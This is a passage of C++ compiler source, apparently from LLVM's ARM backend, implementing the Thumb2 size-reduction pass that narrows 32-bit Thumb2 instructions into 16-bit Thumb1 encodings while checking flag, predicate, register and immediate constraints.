  { ARM::t2STRHs, ARM::tSTRHr, 0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2STR_POST,ARM::tSTMIA_UPD,0, 0, 0, 1, 0, 0,0, 0,1,0 },
  { ARM::t2LDMIA, ARM::tLDMIA, 0, 0, 0, 1, 1, 1,1, 0,1,0 },
  { ARM::t2LDMIA_RET,0, ARM::tPOP_RET, 0, 0, 1, 1, 1,1, 0,1,0 },
  { ARM::t2LDMIA_UPD,ARM::tLDMIA_UPD,ARM::tPOP,0, 0, 1, 1, 1,1, 0,1,0 },
  // ARM::t2STMIA (with no basereg writeback) has no Thumb1 equivalent.
  // tSTMIA_UPD is a change in semantics which can only be used if the base
  // register is killed. This difference is correctly handled elsewhere.
  { ARM::t2STMIA, ARM::tSTMIA_UPD, 0, 0, 0, 1, 1, 1,1, 0,1,0 },
  { ARM::t2STMIA_UPD,ARM::tSTMIA_UPD, 0, 0, 0, 1, 1, 1,1, 0,1,0 },
  { ARM::t2STMDB_UPD, 0, ARM::tPUSH, 0, 0, 1, 1, 1,1, 0,1,0 }
  };
  /// Machine-function pass that rewrites 32-bit Thumb2 instructions into
  /// equivalent 16-bit Thumb1 encodings to shrink code size.
  class Thumb2SizeReduce : public MachineFunctionPass {
  public:
    static char ID;

    // Cached per-function target info; set up in runOnMachineFunction.
    const Thumb2InstrInfo *TII;
    const ARMSubtarget *STI;

    Thumb2SizeReduce(std::function<bool(const Function &)> Ftor = nullptr);

    bool runOnMachineFunction(MachineFunction &MF) override;

    MachineFunctionProperties getRequiredProperties() const override {
      // Runs after register allocation: no virtual registers remain.
      return MachineFunctionProperties().set(
          MachineFunctionProperties::Property::NoVRegs);
    }

    StringRef getPassName() const override {
      return THUMB2_SIZE_REDUCE_NAME;
    }

  private:
    /// ReduceOpcodeMap - Maps wide opcode to index of entry in ReduceTable.
    DenseMap<unsigned, unsigned> ReduceOpcodeMap;

    // True if narrowing Use would add a harmful false CPSR dependency.
    bool canAddPseudoFlagDep(MachineInstr *Use, bool IsSelfLoop);

    // Verify predication / flag-setting compatibility with the narrow form.
    bool VerifyPredAndCC(MachineInstr *MI, const ReduceEntry &Entry,
                         bool is2Addr, ARMCC::CondCodes Pred,
                         bool LiveCPSR, bool &HasCC, bool &CCDead);

    // Narrow a wide load/store per Entry; returns true on success.
    bool ReduceLoadStore(MachineBasicBlock &MBB, MachineInstr *MI,
                         const ReduceEntry &Entry);

    // Handle opcodes whose Entry is marked Special.
    bool ReduceSpecial(MachineBasicBlock &MBB, MachineInstr *MI,
                       const ReduceEntry &Entry, bool LiveCPSR, bool IsSelfLoop);

    /// ReduceTo2Addr - Reduce a 32-bit instruction to a 16-bit two-address
    /// instruction.
    bool ReduceTo2Addr(MachineBasicBlock &MBB, MachineInstr *MI,
                       const ReduceEntry &Entry, bool LiveCPSR,
                       bool IsSelfLoop);

    /// ReduceToNarrow - Reduce a 32-bit instruction to a 16-bit
    /// non-two-address instruction.
    bool ReduceToNarrow(MachineBasicBlock &MBB, MachineInstr *MI,
                        const ReduceEntry &Entry, bool LiveCPSR,
                        bool IsSelfLoop);

    /// ReduceMI - Attempt to reduce MI, return true on success.
    bool ReduceMI(MachineBasicBlock &MBB, MachineInstr *MI,
                  bool LiveCPSR, bool IsSelfLoop);

    /// ReduceMBB - Reduce width of instructions in the specified basic block.
    bool ReduceMBB(MachineBasicBlock &MBB);

    // Optimization-level flags; presumably derived from the function's
    // optsize/minsize attributes — set outside this excerpt, TODO confirm.
    bool OptimizeSize;
    bool MinimizeSize;

    // Last instruction to define CPSR in the current block.
    MachineInstr *CPSRDef;

    // Was CPSR last defined by a high latency instruction?
    // When CPSRDef is null, this refers to CPSR defs in predecessors.
    bool HighLatencyCPSR;

    struct MBBInfo {
      // The flags leaving this block have high latency.
      bool HighLatencyCPSR = false;
      // Has this block been visited yet?
      bool Visited = false;

      MBBInfo() = default;
    };

    // Per-basic-block state, indexed by block number.
    SmallVector<MBBInfo, 8> BlockInfo;

    // Optional predicate restricting which functions the pass runs on.
    std::function<bool(const Function &)> PredicateFtor;
  };
char Thumb2SizeReduce::ID = 0;
} // end anonymous namespace
// Register the pass with LLVM's pass registry under "thumb2-reduce-size".
INITIALIZE_PASS(Thumb2SizeReduce, DEBUG_TYPE, THUMB2_SIZE_REDUCE_NAME, false,
                false)
// Construct the pass and build the wide-opcode -> ReduceTable-index map so
// candidate lookups during reduction are O(1).
Thumb2SizeReduce::Thumb2SizeReduce(std::function<bool(const Function &)> Ftor)
    : MachineFunctionPass(ID), PredicateFtor(std::move(Ftor)) {
  OptimizeSize = false;
  MinimizeSize = false;
  unsigned Index = 0;
  for (const ReduceEntry &Entry : ReduceTable) {
    bool Inserted =
        ReduceOpcodeMap.insert(std::make_pair(Entry.WideOpc, Index)).second;
    if (!Inserted)
      llvm_unreachable("Duplicated entries?");
    ++Index;
  }
}
static bool HasImplicitCPSRDef(const MCInstrDesc &MCID) {
for (const MCPhysReg *Regs = MCID.getImplicitDefs(); *Regs; ++Regs)
if (*Regs == ARM::CPSR)
return true;
return false;
}
// Check for a likely high-latency flag def: only FMSTAT and tMUL qualify.
static bool isHighLatencyCPSR(MachineInstr *Def) {
  unsigned Opc = Def->getOpcode();
  return Opc == ARM::FMSTAT || Opc == ARM::tMUL;
}
/// canAddPseudoFlagDep - For A9 (and other out-of-order) implementations,
/// the 's' 16-bit instruction partially update CPSR. Abort the
/// transformation to avoid adding false dependency on last CPSR setting
/// instruction which hurts the ability for out-of-order execution engine
/// to do register renaming magic.
/// This function checks if there is a read-of-write dependency between the
/// last instruction that defines the CPSR and the current instruction. If there
/// is, then there is no harm done since the instruction cannot be retired
/// before the CPSR setting instruction anyway.
/// Note, we are not doing full dependency analysis here for the sake of compile
/// time. We're not looking for cases like:
/// r0 = muls ...
/// r1 = add.w r0, ...
/// ...
/// = mul.w r1
/// In this case it would have been ok to narrow the mul.w to muls since there
/// are indirect RAW dependency between the muls and the mul.w
bool
Thumb2SizeReduce::canAddPseudoFlagDep(MachineInstr *Use, bool FirstInSelfLoop) {
  // Disable the check for -Oz (aka OptimizeForSizeHarder).
  if (MinimizeSize || !STI->avoidCPSRPartialUpdate())
    return false;

  if (!CPSRDef)
    // If this BB loops back to itself, conservatively avoid narrowing the
    // first instruction that does partial flag update.
    return HighLatencyCPSR || FirstInSelfLoop;

  // Collect the registers (other than CPSR) written by the last
  // CPSR-defining instruction in this block.
  SmallSet<unsigned, 2> Defs;
  for (const MachineOperand &MO : CPSRDef->operands()) {
    if (!MO.isReg() || MO.isUndef() || MO.isUse())
      continue;
    Register Reg = MO.getReg();
    if (Reg == 0 || Reg == ARM::CPSR)
      continue;
    Defs.insert(Reg);
  }

  // If Use reads any of those registers there is already a RAW dependency on
  // CPSRDef, so the extra flag dependency from narrowing is harmless.
  for (const MachineOperand &MO : Use->operands()) {
    if (!MO.isReg() || MO.isUndef() || MO.isDef())
      continue;
    Register Reg = MO.getReg();
    if (Defs.count(Reg))
      return false;
  }

  // If the current CPSR has high latency, try to avoid the false dependency.
  if (HighLatencyCPSR)
    return true;

  // tMOVi8 usually doesn't start long dependency chains, and there are a lot
  // of them, so always shrink them when CPSR doesn't have high latency.
  if (Use->getOpcode() == ARM::t2MOVi ||
      Use->getOpcode() == ARM::t2MOVi16)
    return false;

  // No read-after-write dependency. The narrowing will add false dependency.
  return true;
}
/// Check that MI's predication / CPSR-setting state is compatible with the
/// 16-bit encoding described by Entry (PredCC1 for the narrow form, PredCC2
/// for the two-address form). On success, HasCC/CCDead are updated to the
/// CPSR behaviour the narrow instruction must carry.
bool
Thumb2SizeReduce::VerifyPredAndCC(MachineInstr *MI, const ReduceEntry &Entry,
                                  bool is2Addr, ARMCC::CondCodes Pred,
                                  bool LiveCPSR, bool &HasCC, bool &CCDead) {
  // Encoding 0: flag-setting iff unpredicated.
  if ((is2Addr && Entry.PredCC2 == 0) ||
      (!is2Addr && Entry.PredCC1 == 0)) {
    if (Pred == ARMCC::AL) {
      // Not predicated, must set CPSR.
      if (!HasCC) {
        // Original instruction was not setting CPSR, but CPSR is not
        // currently live anyway. It's ok to set it. The CPSR def is
        // dead though.
        if (!LiveCPSR) {
          HasCC = true;
          CCDead = true;
          return true;
        }
        return false;
      }
    } else {
      // Predicated, must not set CPSR.
      if (HasCC)
        return false;
    }
  // Encoding 2: narrow form always sets CPSR.
  } else if ((is2Addr && Entry.PredCC2 == 2) ||
             (!is2Addr && Entry.PredCC1 == 2)) {
    /// Old opcode has an optional def of CPSR.
    if (HasCC)
      return true;
    // If old opcode does not implicitly define CPSR, then it's not ok since
    // these new opcodes' CPSR def is not meant to be thrown away. e.g. CMP.
    if (!HasImplicitCPSRDef(MI->getDesc()))
      return false;
    HasCC = true;
  } else {
    // 16-bit instruction does not set CPSR.
    if (HasCC)
      return false;
  }

  return true;
}
// Check that every explicit register operand of MI is encodable by a 16-bit
// instruction: low registers only, except for a few multi-register transfer
// opcodes that tolerate PC/LR/SP, and ldr/str with SP as the base.
static bool VerifyLowRegs(MachineInstr *MI) {
  unsigned Opc = MI->getOpcode();
  bool AllowPC = (Opc == ARM::t2LDMIA_RET || Opc == ARM::t2LDMIA_UPD);
  bool AllowLR = (Opc == ARM::t2STMDB_UPD);
  bool AllowSP = AllowPC || AllowLR;
  unsigned NumOps = MI->getNumOperands();
  for (unsigned OpIdx = 0; OpIdx != NumOps; ++OpIdx) {
    const MachineOperand &MO = MI->getOperand(OpIdx);
    if (!MO.isReg() || MO.isImplicit())
      continue;
    Register Reg = MO.getReg();
    if (Reg == 0 || Reg == ARM::CPSR)
      continue;
    if (AllowPC && Reg == ARM::PC)
      continue;
    if (AllowLR && Reg == ARM::LR)
      continue;
    if (Reg == ARM::SP) {
      if (AllowSP)
        continue;
      // Special case for these ldr / str with sp as base register.
      if (OpIdx == 1 && (Opc == ARM::t2LDRi12 || Opc == ARM::t2STRi12))
        continue;
    }
    if (!isARMLowRegister(Reg))
      return false;
  }
  return true;
}
/// ReduceLoadStore - Attempt to replace the 32-bit Thumb2 load / store \p MI
/// with the narrow 16-bit opcode(s) described by \p Entry. Each addressing
/// form (immediate offset, register offset, post-increment, load/store
/// multiple) has its own encoding restrictions which are validated here.
/// On success the 16-bit replacement is inserted, the original instruction is
/// erased and true is returned; otherwise \p MI is left untouched.
bool
Thumb2SizeReduce::ReduceLoadStore(MachineBasicBlock &MBB, MachineInstr *MI,
                                  const ReduceEntry &Entry) {
  // Honor the debugging knob that caps how many ld/st reductions we perform.
  if (ReduceLimitLdSt != -1 && ((int)NumLdSts >= ReduceLimitLdSt))
    return false;
  unsigned Scale = 1;
  bool HasImmOffset = false;
  bool HasShift = false;
  bool HasOffReg = true;
  bool isLdStMul = false;
  unsigned Opc = Entry.NarrowOpc1;
  unsigned OpNum = 3; // First 'rest' of operands.
  uint8_t ImmLimit = Entry.Imm1Limit;
  switch (Entry.WideOpc) {
  default:
    llvm_unreachable("Unexpected Thumb2 load / store opcode!");
  case ARM::t2LDRi12:
  case ARM::t2STRi12:
    // SP-relative loads/stores use the alternate narrow opcode/limit.
    if (MI->getOperand(1).getReg() == ARM::SP) {
      Opc = Entry.NarrowOpc2;
      ImmLimit = Entry.Imm2Limit;
    }
    Scale = 4;
    HasImmOffset = true;
    HasOffReg = false;
    break;
  case ARM::t2LDRBi12:
  case ARM::t2STRBi12:
    HasImmOffset = true;
    HasOffReg = false;
    break;
  case ARM::t2LDRHi12:
  case ARM::t2STRHi12:
    Scale = 2;
    HasImmOffset = true;
    HasOffReg = false;
    break;
  case ARM::t2LDRs:
  case ARM::t2LDRBs:
  case ARM::t2LDRHs:
  case ARM::t2LDRSBs:
  case ARM::t2LDRSHs:
  case ARM::t2STRs:
  case ARM::t2STRBs:
  case ARM::t2STRHs:
    HasShift = true;
    OpNum = 4;
    break;
  case ARM::t2LDR_POST:
  case ARM::t2STR_POST: {
    if (!MinimizeSize)
      return false;
    if (!MI->hasOneMemOperand() ||
        (*MI->memoperands_begin())->getAlign() < Align(4))
      return false;
    // We're creating a completely different type of load/store - LDM from LDR.
    // For this reason we can't reuse the logic at the end of this function; we
    // have to implement the MI building here.
    bool IsStore = Entry.WideOpc == ARM::t2STR_POST;
    Register Rt = MI->getOperand(IsStore ? 1 : 0).getReg();
    Register Rn = MI->getOperand(IsStore ? 0 : 1).getReg();
    unsigned Offset = MI->getOperand(3).getImm();
    unsigned PredImm = MI->getOperand(4).getImm();
    Register PredReg = MI->getOperand(5).getReg();
    assert(isARMLowRegister(Rt));
    assert(isARMLowRegister(Rn));
    // LDM/STM implies a post-increment of exactly one register (4 bytes).
    if (Offset != 4)
      return false;
    // Add the 16-bit load / store instruction.
    DebugLoc dl = MI->getDebugLoc();
    auto MIB = BuildMI(MBB, MI, dl, TII->get(Entry.NarrowOpc1))
                   .addReg(Rn, RegState::Define)
                   .addReg(Rn)
                   .addImm(PredImm)
                   .addReg(PredReg)
                   .addReg(Rt, IsStore ? 0 : RegState::Define);
    // Transfer memoperands.
    MIB.setMemRefs(MI->memoperands());
    // Transfer MI flags.
    MIB.setMIFlags(MI->getFlags());
    // Kill the old instruction.
    MI->eraseFromBundle();
    ++NumLdSts;
    return true;
  }
  case ARM::t2LDMIA: {
    Register BaseReg = MI->getOperand(0).getReg();
    assert(isARMLowRegister(BaseReg));
    // For the non-writeback version (this one), the base register must be
    // one of the registers being loaded.
    bool isOK = false;
    for (unsigned i = 3; i < MI->getNumOperands(); ++i) {
      if (MI->getOperand(i).getReg() == BaseReg) {
        isOK = true;
        break;
      }
    }
    if (!isOK)
      return false;
    OpNum = 0;
    isLdStMul = true;
    break;
  }
  case ARM::t2STMIA: {
    // t2STMIA is reduced to tSTMIA_UPD which has writeback. We can only do this
    // if the base register is killed, as then it doesn't matter what its value
    // is after the instruction.
    if (!MI->getOperand(0).isKill())
      return false;
    // If the base register is in the register list and isn't the lowest
    // numbered register (i.e. it's in operand 4 onwards) then with writeback
    // the stored value is unknown, so we can't convert to tSTMIA_UPD.
    Register BaseReg = MI->getOperand(0).getReg();
    for (unsigned i = 4; i < MI->getNumOperands(); ++i)
      if (MI->getOperand(i).getReg() == BaseReg)
        return false;
    break;
  }
  case ARM::t2LDMIA_RET: {
    Register BaseReg = MI->getOperand(1).getReg();
    if (BaseReg != ARM::SP)
      return false;
    Opc = Entry.NarrowOpc2; // tPOP_RET
    OpNum = 2;
    isLdStMul = true;
    break;
  }
  case ARM::t2LDMIA_UPD:
  case ARM::t2STMIA_UPD:
  case ARM::t2STMDB_UPD: {
    OpNum = 0;
    Register BaseReg = MI->getOperand(1).getReg();
    if (BaseReg == ARM::SP &&
        (Entry.WideOpc == ARM::t2LDMIA_UPD ||
         Entry.WideOpc == ARM::t2STMDB_UPD)) {
      Opc = Entry.NarrowOpc2; // tPOP or tPUSH
      OpNum = 2;
    } else if (!isARMLowRegister(BaseReg) ||
               (Entry.WideOpc != ARM::t2LDMIA_UPD &&
                Entry.WideOpc != ARM::t2STMIA_UPD)) {
      return false;
    }
    isLdStMul = true;
    break;
  }
  }
  unsigned OffsetReg = 0;
  bool OffsetKill = false;
  bool OffsetInternal = false;
  if (HasShift) {
    OffsetReg = MI->getOperand(2).getReg();
    OffsetKill = MI->getOperand(2).isKill();
    OffsetInternal = MI->getOperand(2).isInternalRead();
    if (MI->getOperand(3).getImm())
      // Thumb1 addressing mode doesn't support shift.
      return false;
  }
  unsigned OffsetImm = 0;
  if (HasImmOffset) {
    OffsetImm = MI->getOperand(2).getImm();
    unsigned MaxOffset = ((1 << ImmLimit) - 1) * Scale;
    // The narrow immediate must be naturally aligned and in range.
    if ((OffsetImm & (Scale - 1)) || OffsetImm > MaxOffset)
      // Make sure the immediate field fits.
      return false;
  }
  // Add the 16-bit load / store instruction.
  DebugLoc dl = MI->getDebugLoc();
  MachineInstrBuilder MIB = BuildMI(MBB, MI, dl, TII->get(Opc));
  // tSTMIA_UPD takes a defining register operand. We've already checked that
  // the register is killed, so mark it as dead here.
  if (Entry.WideOpc == ARM::t2STMIA)
    MIB.addReg(MI->getOperand(0).getReg(), RegState::Define | RegState::Dead);
  if (!isLdStMul) {
    MIB.add(MI->getOperand(0));
    MIB.add(MI->getOperand(1));
    if (HasImmOffset)
      MIB.addImm(OffsetImm / Scale);
    assert((!HasShift || OffsetReg) && "Invalid so_reg load / store address!");
    if (HasOffReg)
      MIB.addReg(OffsetReg, getKillRegState(OffsetKill) |
                                getInternalReadRegState(OffsetInternal));
  }
  // Transfer the rest of operands.
  for (unsigned e = MI->getNumOperands(); OpNum != e; ++OpNum)
    MIB.add(MI->getOperand(OpNum));
  // Transfer memoperands.
  MIB.setMemRefs(MI->memoperands());
  // Transfer MI flags.
  MIB.setMIFlags(MI->getFlags());
  LLVM_DEBUG(errs() << "Converted 32-bit: " << *MI
                    << " to 16-bit: " << *MIB);
  MBB.erase_instr(MI);
  ++NumLdSts;
  return true;
}
/// ReduceSpecial - Handle "special" opcodes whose reduction doesn't fit the
/// generic table-driven paths: SP-relative ADD, loads/stores, flag-setting
/// arithmetic, extend instructions with zero rotation, CMP and TEQ. Returns
/// true if \p MI was replaced by a 16-bit equivalent.
bool
Thumb2SizeReduce::ReduceSpecial(MachineBasicBlock &MBB, MachineInstr *MI,
                                const ReduceEntry &Entry,
                                bool LiveCPSR, bool IsSelfLoop) {
  unsigned Opc = MI->getOpcode();
  if (Opc == ARM::t2ADDri) {
    // If the source register is SP, try to reduce to tADDrSPi, otherwise
    // it's a normal reduce.
    if (MI->getOperand(1).getReg() != ARM::SP) {
      if (ReduceTo2Addr(MBB, MI, Entry, LiveCPSR, IsSelfLoop))
        return true;
      return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
    }
    // Try to reduce to tADDrSPi.
    unsigned Imm = MI->getOperand(2).getImm();
    // The immediate must be in range, the destination register must be a low
    // reg, the predicate must be "always" and the condition flags must not
    // be being set.
    if (Imm & 3 || Imm > 1020)
      return false;
    if (!isARMLowRegister(MI->getOperand(0).getReg()))
      return false;
    if (MI->getOperand(3).getImm() != ARMCC::AL)
      return false;
    const MCInstrDesc &MCID = MI->getDesc();
    if (MCID.hasOptionalDef() &&
        MI->getOperand(MCID.getNumOperands()-1).getReg() == ARM::CPSR)
      return false;
    MachineInstrBuilder MIB =
        BuildMI(MBB, MI, MI->getDebugLoc(),
                TII->get(ARM::tADDrSPi))
            .add(MI->getOperand(0))
            .add(MI->getOperand(1))
            .addImm(Imm / 4) // The tADDrSPi has an implied scale by four.
            .add(predOps(ARMCC::AL));
    // Transfer MI flags.
    MIB.setMIFlags(MI->getFlags());
    LLVM_DEBUG(errs() << "Converted 32-bit: " << *MI
                      << " to 16-bit: " << *MIB);
    MBB.erase_instr(MI);
    ++NumNarrows;
    return true;
  }
  if (Entry.LowRegs1 && !VerifyLowRegs(MI))
    return false;
  if (MI->mayLoadOrStore())
    return ReduceLoadStore(MBB, MI, Entry);
  switch (Opc) {
  default: break;
  case ARM::t2ADDSri:
  case ARM::t2ADDSrr: {
    // Flag-setting adds can only narrow when unpredicated.
    Register PredReg;
    if (getInstrPredicate(*MI, PredReg) == ARMCC::AL) {
      switch (Opc) {
      default: break;
      case ARM::t2ADDSri:
        if (ReduceTo2Addr(MBB, MI, Entry, LiveCPSR, IsSelfLoop))
          return true;
        LLVM_FALLTHROUGH;
      case ARM::t2ADDSrr:
        return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
      }
    }
    break;
  }
  case ARM::t2RSBri:
  case ARM::t2RSBSri:
  case ARM::t2SXTB:
  case ARM::t2SXTH:
  case ARM::t2UXTB:
  case ARM::t2UXTH:
    // These only narrow when the immediate / rotation operand is zero.
    if (MI->getOperand(2).getImm() == 0)
      return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
    break;
  case ARM::t2MOVi16:
    // Can convert only 'pure' immediate operands, not immediates obtained as
    // globals' addresses.
    if (MI->getOperand(1).isImm())
      return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
    break;
  case ARM::t2CMPrr: {
    // Try to reduce to the lo-reg only version first. Why there are two
    // versions of the instruction is a mystery.
    // It would be nice to just have two entries in the master table that
    // are prioritized, but the table assumes a unique entry for each
    // source insn opcode. So for now, we hack a local entry record to use.
    static const ReduceEntry NarrowEntry =
      { ARM::t2CMPrr,ARM::tCMPr, 0, 0, 0, 1, 1,2, 0, 0,1,0 };
    if (ReduceToNarrow(MBB, MI, NarrowEntry, LiveCPSR, IsSelfLoop))
      return true;
    return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
  }
  case ARM::t2TEQrr: {
    Register PredReg;
    // Can only convert to eors if we're not in an IT block.
    if (getInstrPredicate(*MI, PredReg) != ARMCC::AL)
      break;
    // TODO if Operand 0 is not killed but Operand 1 is, then we could write
    // to Op1 instead.
    if (MI->getOperand(0).isKill())
      return ReduceToNarrow(MBB, MI, Entry, LiveCPSR, IsSelfLoop);
  }
  }
  return false;
}
/// ReduceTo2Addr - Try to replace \p MI with its 16-bit two-address form
/// (Entry.NarrowOpc2), where the destination is tied to the first source.
/// Commutes operands when legal to create the tied pair, then verifies low
/// registers, immediate range and CPSR / predicate compatibility before
/// emitting the narrow instruction and erasing \p MI.
bool
Thumb2SizeReduce::ReduceTo2Addr(MachineBasicBlock &MBB, MachineInstr *MI,
                                const ReduceEntry &Entry,
                                bool LiveCPSR, bool IsSelfLoop) {
  if (ReduceLimit2Addr != -1 && ((int)Num2Addrs >= ReduceLimit2Addr))
    return false;
  if (!OptimizeSize && Entry.AvoidMovs && STI->avoidMOVsShifterOperand())
    // Don't issue movs with shifter operand for some CPUs unless we
    // are optimizing for size.
    return false;
  Register Reg0 = MI->getOperand(0).getReg();
  Register Reg1 = MI->getOperand(1).getReg();
  // t2MUL is "special". The tied source operand is second, not first.
  if (MI->getOpcode() == ARM::t2MUL) {
    Register Reg2 = MI->getOperand(2).getReg();
    // Early exit if the regs aren't all low regs.
    if (!isARMLowRegister(Reg0) || !isARMLowRegister(Reg1)
        || !isARMLowRegister(Reg2))
      return false;
    if (Reg0 != Reg2) {
      // If the other operand also isn't the same as the destination, we
      // can't reduce.
      if (Reg1 != Reg0)
        return false;
      // Try to commute the operands to make it a 2-address instruction.
      MachineInstr *CommutedMI = TII->commuteInstruction(*MI);
      if (!CommutedMI)
        return false;
    }
  } else if (Reg0 != Reg1) {
    // Try to commute the operands to make it a 2-address instruction.
    unsigned CommOpIdx1 = 1;
    unsigned CommOpIdx2 = TargetInstrInfo::CommuteAnyOperandIndex;
    if (!TII->findCommutedOpIndices(*MI, CommOpIdx1, CommOpIdx2) ||
        MI->getOperand(CommOpIdx2).getReg() != Reg0)
      return false;
    MachineInstr *CommutedMI =
        TII->commuteInstruction(*MI, false, CommOpIdx1, CommOpIdx2);
    if (!CommutedMI)
      return false;
  }
  if (Entry.LowRegs2 && !isARMLowRegister(Reg0))
    return false;
  if (Entry.Imm2Limit) {
    // Immediate-form narrow opcode: the constant must fit its field.
    unsigned Imm = MI->getOperand(2).getImm();
    unsigned Limit = (1 << Entry.Imm2Limit) - 1;
    if (Imm > Limit)
      return false;
  } else {
    Register Reg2 = MI->getOperand(2).getReg();
    if (Entry.LowRegs2 && !isARMLowRegister(Reg2))
      return false;
  }
  // Check if it's possible / necessary to transfer the predicate.
  const MCInstrDesc &NewMCID = TII->get(Entry.NarrowOpc2);
  Register PredReg;
  ARMCC::CondCodes Pred = getInstrPredicate(*MI, PredReg);
  bool SkipPred = false;
  if (Pred != ARMCC::AL) {
    if (!NewMCID.isPredicable())
      // Can't transfer predicate, fail.
      return false;
  } else {
    SkipPred = !NewMCID.isPredicable();
  }
  bool HasCC = false;
  bool CCDead = false;
  const MCInstrDesc &MCID = MI->getDesc();
  if (MCID.hasOptionalDef()) {
    unsigned NumOps = MCID.getNumOperands();
    HasCC = (MI->getOperand(NumOps-1).getReg() == ARM::CPSR);
    if (HasCC && MI->getOperand(NumOps-1).isDead())
      CCDead = true;
  }
  if (!VerifyPredAndCC(MI, Entry, true, Pred, LiveCPSR, HasCC, CCDead))
    return false;
  // Avoid adding a false dependency on partial flag update by some 16-bit
  // instructions which has the 's' bit set.
  if (Entry.PartFlag && NewMCID.hasOptionalDef() && HasCC &&
      canAddPseudoFlagDep(MI, IsSelfLoop))
    return false;
  // Add the 16-bit instruction.
  DebugLoc dl = MI->getDebugLoc();
  MachineInstrBuilder MIB = BuildMI(MBB, MI, dl, NewMCID);
  MIB.add(MI->getOperand(0));
  if (NewMCID.hasOptionalDef())
    MIB.add(HasCC ? t1CondCodeOp(CCDead) : condCodeOp());
  // Transfer the rest of operands.
  unsigned NumOps = MCID.getNumOperands();
  for (unsigned i = 1, e = MI->getNumOperands(); i != e; ++i) {
    if (i < NumOps && MCID.OpInfo[i].isOptionalDef())
      continue;
    if (SkipPred && MCID.OpInfo[i].isPredicate())
      continue;
    MIB.add(MI->getOperand(i));
  }
  // Transfer MI flags.
  MIB.setMIFlags(MI->getFlags());
  LLVM_DEBUG(errs() << "Converted 32-bit: " << *MI
                    << " to 16-bit: " << *MIB);
  MBB.erase_instr(MI);
  ++Num2Addrs;
  return true;
}
/// ReduceToNarrow - Try to replace \p MI with the general (non-two-address)
/// 16-bit form Entry.NarrowOpc1. All register operands must be low registers
/// and any immediate must fit Entry.Imm1Limit bits; predicate and CPSR
/// constraints are checked via VerifyPredAndCC. On success the narrow
/// instruction is emitted and \p MI is erased.
bool
Thumb2SizeReduce::ReduceToNarrow(MachineBasicBlock &MBB, MachineInstr *MI,
                                 const ReduceEntry &Entry,
                                 bool LiveCPSR, bool IsSelfLoop) {
  if (ReduceLimit != -1 && ((int)NumNarrows >= ReduceLimit))
    return false;
  if (!OptimizeSize && Entry.AvoidMovs && STI->avoidMOVsShifterOperand())
    // Don't issue movs with shifter operand for some CPUs unless we
    // are optimizing for size.
    return false;
  unsigned Limit = ~0U;
  if (Entry.Imm1Limit)
    Limit = (1 << Entry.Imm1Limit) - 1;
  const MCInstrDesc &MCID = MI->getDesc();
  // Reject any operand the narrow encoding cannot express.
  for (unsigned i = 0, e = MCID.getNumOperands(); i != e; ++i) {
    if (MCID.OpInfo[i].isPredicate())
      continue;
    const MachineOperand &MO = MI->getOperand(i);
    if (MO.isReg()) {
      Register Reg = MO.getReg();
      if (!Reg || Reg == ARM::CPSR)
        continue;
      if (Entry.LowRegs1 && !isARMLowRegister(Reg))
        return false;
    } else if (MO.isImm() &&
               !MCID.OpInfo[i].isPredicate()) {
      if (((unsigned)MO.getImm()) > Limit)
        return false;
    }
  }
  // Check if it's possible / necessary to transfer the predicate.
  const MCInstrDesc &NewMCID = TII->get(Entry.NarrowOpc1);
  Register PredReg;
  ARMCC::CondCodes Pred = getInstrPredicate(*MI, PredReg);
  bool SkipPred = false;
  if (Pred != ARMCC::AL) {
    if (!NewMCID.isPredicable())
      // Can't transfer predicate, fail.
      return false;
  } else {
    SkipPred = !NewMCID.isPredicable();
  }
  bool HasCC = false;
  bool CCDead = false;
  if (MCID.hasOptionalDef()) {
    unsigned NumOps = MCID.getNumOperands();
    HasCC = (MI->getOperand(NumOps-1).getReg() == ARM::CPSR);
    if (HasCC && MI->getOperand(NumOps-1).isDead())
      CCDead = true;
  }
  if (!VerifyPredAndCC(MI, Entry, false, Pred, LiveCPSR, HasCC, CCDead))
    return false;
  // Avoid adding a false dependency on partial flag update by some 16-bit
  // instructions which has the 's' bit set.
  if (Entry.PartFlag && NewMCID.hasOptionalDef() && HasCC &&
      canAddPseudoFlagDep(MI, IsSelfLoop))
    return false;
  // Add the 16-bit instruction.
  DebugLoc dl = MI->getDebugLoc();
  MachineInstrBuilder MIB = BuildMI(MBB, MI, dl, NewMCID);
  // TEQ is special in that it doesn't define a register but we're converting
  // it into an EOR which does. So add the first operand as a def and then
  // again as a use.
  if (MCID.getOpcode() == ARM::t2TEQrr) {
    MIB.add(MI->getOperand(0));
    MIB->getOperand(0).setIsKill(false);
    MIB->getOperand(0).setIsDef(true);
    MIB->getOperand(0).setIsDead(true);
    if (NewMCID.hasOptionalDef())
      MIB.add(HasCC ? t1CondCodeOp(CCDead) : condCodeOp());
    MIB.add(MI->getOperand(0));
  } else {
    MIB.add(MI->getOperand(0));
    if (NewMCID.hasOptionalDef())
      MIB.add(HasCC ? t1CondCodeOp(CCDead) : condCodeOp());
  }
  // Transfer the rest of operands.
  unsigned NumOps = MCID.getNumOperands();
  for (unsigned i = 1, e = MI->getNumOperands(); i != e; ++i) {
    if (i < NumOps && MCID.OpInfo[i].isOptionalDef())
      continue;
    if ((MCID.getOpcode() == ARM::t2RSBSri ||
         MCID.getOpcode() == ARM::t2RSBri ||
         MCID.getOpcode() == ARM::t2SXTB ||
         MCID.getOpcode() == ARM::t2SXTH ||
         MCID.getOpcode() == ARM::t2UXTB ||
         MCID.getOpcode() == ARM::t2UXTH) && i == 2)
      // Skip the zero immediate operand, it's now implicit.
      continue;
    bool isPred = (i < NumOps && MCID.OpInfo[i].isPredicate());
    if (SkipPred && isPred)
      continue;
    const MachineOperand &MO = MI->getOperand(i);
    if (MO.isReg() && MO.isImplicit() && MO.getReg() == ARM::CPSR)
      // Skip implicit def of CPSR. Either it's modeled as an optional
      // def now or it's already an implicit def on the new instruction.
      continue;
    MIB.add(MO);
  }
  if (!MCID.isPredicable() && NewMCID.isPredicable())
    MIB.add(predOps(ARMCC::AL));
  // Transfer MI flags.
  MIB.setMIFlags(MI->getFlags());
  LLVM_DEBUG(errs() << "Converted 32-bit: " << *MI
                    << " to 16-bit: " << *MIB);
  MBB.erase_instr(MI);
  ++NumNarrows;
  return true;
}
